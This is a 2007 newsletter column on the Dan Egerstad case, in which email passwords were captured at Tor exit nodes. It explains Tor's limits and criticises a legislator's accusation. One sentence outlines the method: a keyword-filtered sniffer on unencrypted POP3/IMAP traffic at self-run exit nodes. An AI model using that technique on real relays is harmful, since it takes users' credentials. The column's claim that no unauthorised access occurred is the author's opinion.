First published: 31st October 2007
Anonymity and privacy are not the same: when you walk down the street you are in the public view but you are a "face in the crowd", fairly anonymous. You can increase your anonymity, say by wearing a mask (I have an infectious disease today...) but what you are doing is still completely public. Conversely, voting is different: the polling station staff record your identity, in Hong Kong that will be verified with your ID card, but how you vote is entirely private.
The same applies on the Internet, which brings us to the case reported in this newsletter last month where Swedish security researcher Dan Egerstad published a list of one hundred passwords of government-related email accounts, including Legislative Council members. Mr. Egerstad has now revealed how he did it. He set up five ToR exit nodes, at different locations in the world, equipped with a custom packet-sniffer focused entirely on POP3 and IMAP traffic using a keyword-filter looking for interesting government-related domains.
Tor is a network of virtual tunnels that allows people and groups to improve their anonymity on the internet. A user can install a Tor client and their traffic will be fed through a network of Tor nodes before exiting to the ordinary internet to reach its destination. No node will know both the source and destination. There are many valid uses for Tor, groups like the Electronic Frontier Foundation (EFF) recommend it for maintaining civil liberties online.
What Tor cannot do is protect the communication after it has left the network; the exit node, and anyone along the route that the traffic takes to its destination, can examine the contents. If the contents are an unencrypted POP3 or IMAP session, that includes your email address and password, which completely undermines the anonymity provided by Tor. The Tor developers are completely open about this limitation, and recommend end-to-end encryption to deal with it. The users whose account details were revealed by Mr. Egerstad ignored this advice. RTFM (Read The Friendly Manual).
On 5th September 2007, one of the people who used Tor without reading the manual, Hon. Sin Chung Kai, wrote of Mr. Egerstad, "I seriously condemn the hacking activities of this person. His attack to the network likely constitutes a violation of Hong Kong laws, such as Telecommunication Ordinance (Chapter 106) Section 27A Unauthorized access to computer by telecommunications; Crimes Ordinance (Chapter 200) Section 161 Access to computer with criminal or dishonest intent, etc, which can lead to criminal liability." From the details revealed by Mr. Egerstad, it is clear that there was no unauthorised access to a computer, and no apparent criminal or dishonest intent. Perhaps Hon. Sin would like to withdraw his accusation and apologise to Mr. Egerstad?